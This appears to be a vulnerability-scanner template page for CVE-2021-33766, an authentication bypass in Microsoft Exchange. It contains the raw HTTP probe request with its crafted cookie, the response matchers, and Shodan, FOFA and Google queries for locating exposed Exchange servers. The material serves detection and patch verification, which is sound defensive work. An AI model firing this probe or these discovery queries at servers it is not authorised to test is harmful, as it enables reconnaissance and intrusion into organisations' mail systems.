Microsoft Exchange - Authentication Bypass
CVE-2021-33766
Early Release
Description
Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.
Severity
High
CVSS Score
7.3
Affected Product
exchange_server
Published Date
October 10, 2025
Template Author
daffainfo
CVE-2021-33766.yaml
id: CVE-2021-33766

info:
  name: Microsoft Exchange - Authentication Bypass
  author: daffainfo
  severity: high
  description: |
    Microsoft Exchange Server Information Disclosure Vulnerability. This vulnerability enables an attacker to bypass authentication and gain access to the Exchange Server's internal.
  reference:
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33766
    - https://www.zerodayinitiative.com/advisories/ZDI-21-798/
    - https://github.com/demossl/CVE-2021-33766-ProxyToken
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33766
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2021-33766
    cwe-id: NVD-CWE-noinfo
    cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query:
      - vuln:cve-2021-26855
      - http.favicon.hash:1768726119
      - http.title:"outlook"
      - cpe:"cpe:2.3:a:microsoft:exchange_server"
    fofa-query:
      - title="outlook"
      - icon_hash=1768726119
    google-query: intitle:"outlook"
  tags: cve,cve2021,microsoft,exchange,auth-bypass,kev,vkev

variables:
  email: "{{randstr}}@{{rand_base(5)}}.com"

http:
  - raw:
      - |
        GET /ecp/{{email}}/PersonalSettings/HomePage.aspx?showhelp=false HTTP/1.1
        Host: {{Hostname}}
        Cookie: SecurityToken=x

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<span id="msgCode">403</span>'
          - 'function signOut() {'
        condition: and

      - type: word
        part: header
        words:
          - "Microsoft.Exchange.Data.Storage.ObjectNotFoundException"
          - "X-BEResource="
        condition: and

      - type: status
        status:
          - 403
# digest: 4a0a004730450220087fcb26561c682077f150013b33114dc587f3800bfb0dcbc44067bf4c46adb5022100e669dcb4f991ace62475c9e709ffd6407cd8c832e01cc6df58b4ee97e4289607:922c64590222798bb761d5b6d8e72950
Score: 7.3
CVSS Metrics
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVE ID: CVE-2021-33766
CWE ID: NVD-CWE-noinfo